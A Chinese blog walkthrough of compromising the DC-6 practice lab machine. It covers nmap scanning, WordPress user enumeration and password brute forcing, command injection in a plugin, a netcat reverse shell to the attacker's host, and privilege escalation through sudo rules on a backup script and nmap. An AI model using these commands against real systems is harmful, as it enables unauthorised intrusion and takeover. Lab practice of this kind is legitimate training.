DC-6靶机渗透测试

📅 2026/8/1 4:29:45 👁️ 阅读次数 📝 编程学习
DC-6靶机渗透测试

先对内网进行探活扫描

nmap -sn 192.168.207.0/24

dc-6的ip是192.168.207.136,进行端口扫描

nmap -sV -p- 192.168.207.136

有两个端口22(ssh)80(http),先上浏览器访问http://192.168.207.136查看一下网站内容

修改hosts文件

nano /etc/hosts
192.168.207.136 wordy

重新访问http://wordy

用的wordpress框架,进行目录扫描

dirsearch -u http://wordy

找到了wp-login.php

使用wpscan获取用户名

wpscan --url http://wordy -e u

有admin、mark、graham、sarah、jens五个账户,等会可以考虑ssh

接下来破解密码,使用kali自带的rockyou.txt

这个需要先解压

cd /usr/share/wordlists
gzip -d rockyou.txt.gz
mv rockyou.txt /home/kali

因为rockyou太大了,要大约尝试71721960次,我后来查看靶机官网,提示我们使用以下命令

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

grep k01 > passwords.txt:查找包含字符串 k01 的行,重定向输出到文件

等于是给我们缩小爆破范围,但是实际爆破肯定是没有这个信息的,或者需要我们自己去收集这个信息

在/home/kali目录下进行密码破解

wpscan --url http://wordy --passwords passwords.txt

跑出mark / helpdesk01

登录看看

成功进入后台

查看网页功能发现Activity monitor > Tools里输入ip后,点击lookup后有回显

可以考虑rce远程命令注入

想要输入其他命令发现不能输入,有字数限制

打开f12,框选输入框

将maxlength改为150就可以了

写反弹shell到kali终端上

nc -lvvp 6666

nc 192.168.207.128 6666 -e /bin/bash

python -c 'import pty;pty.spawn("/bin/bash")'

切换到home目录

查看mark目录有什么

查看things-to-do.txt

cat things-to-do.txt

恢复超空间驱动器的全部功能(需要与Jens沟通)

为Sarah的欢送会购买礼物

新增用户:graham - GSo7isUM1D4 - 已完成

申请OSCP课程

为Sarah的接替者购买新笔记本电脑

这里可知graham / GSo7isUM1D4

ssh graham@192.168.207.136 -p 22

查看当前用户可执行操作

sudo -l

可以操作backups.sh,但是要切换到jens用户来执行

echo "/bin/bash" >> /home/jens/backups.sh

将/bin/bash追加写入到backups.sh中

sudo -u jens /home/jens/backups.sh

sudo -u jens:以jens用户身份来执行后面的命令

sudo -l

nmap可以以root身份执行

搜索nmap提权

TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF

whoami

cat theflag.txt

渗透测试成功